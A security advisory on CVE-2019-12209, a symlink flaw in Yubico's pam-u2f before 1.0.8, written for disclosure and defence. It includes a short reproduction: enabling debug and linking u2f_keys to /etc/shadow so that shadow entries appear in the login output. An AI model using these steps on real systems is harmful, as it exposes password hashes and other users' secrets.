ASA-2019-00322 – pam-u2f: Symlink attack on u2f_keys leading to possible information leak

Posted on by Allele Security Intelligence in Alerts

Allele Security Alert

ASA-2019-00322

Identifier(s)

ASA-2019-00322, CVE-2019-12209

Title

Symlink attack on u2f_keys leading to possible information leak

Vendor(s)

Yubico

Product(s)

pam-u2f

Affected version(s)

pam-u2f versions before 1.0.8

Fixed version(s)

pam-u2f version 1.0.8

Proof of concept

Unknown

Description

The file `$HOME/.config/Yubico/u2f_keys` is blindly followed by the PAM module. It can be a symlink pointing to an arbitrary file. The PAM module only rejects non-regular files and files owned by other users than root or the to-be-authenticated user. Even these checks are only made after open()’ing the file, which may already trigger certain logic in the kernel that is otherwise not reachable to regular users.

Technical details

If the PAM modules’ `debug` option is also enabled then most of the content of the file is written either to stdout, stderr, syslog or to the defined debug file. Therefore this can pose an information leak to access e.g. the contents of /etc/shadow, /root/.bash_history or similar sensitive files. Furthermore the symlink attack can be used to use other users’ u2f_keys files in the authentication process.

For example use the following line in the PAM stack:

auth optional pam_u2f.so debug

Then prepare a suitable symlink:

user$ mkdir -p ~/.config/Yubico
user$ ln -s /etc/shadow ~/.config/Yubico/u2f_keys

Then authenticate the user on a text console:

host login: user
Password: XXX
[...]
debug(pam_u2f): Authorization line: avahi:!:18019::::::
[...]

Notice the lines from /etc/shadow being output on the terminal.

Credits

Matthias Gerstner (SUSE Security Team)

Reference(s)

pam-u2f: CVE-2019-12210: debug_file file descriptor leak, CVE-2019-12209: symlink attack on u2f_keys leading to possible information leak
https://seclists.org/oss-sec/2019/q2/149

Drop privileges by default when opening user-related files
https://github.com/Yubico/pam-u2f/commit/7db3386fcdb454e33a3ea30dcfb8e8960d4c3aa3

Release Notes
https://developers.yubico.com/pam-u2f/Release_Notes.html

pam-u2f
https://developers.yubico.com/pam-u2f/

CVE-2019-12209
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12209

CVE-2019-12209
https://nvd.nist.gov/vuln/detail/CVE-2019-12209

If there is any error in this alert or you wish a comprehensive analysis, let us know.

Last modified: June 8, 2019

We are not responsible for any data loss, device corruption or any other type of issue due to the use of any information mentioned in our security alerts.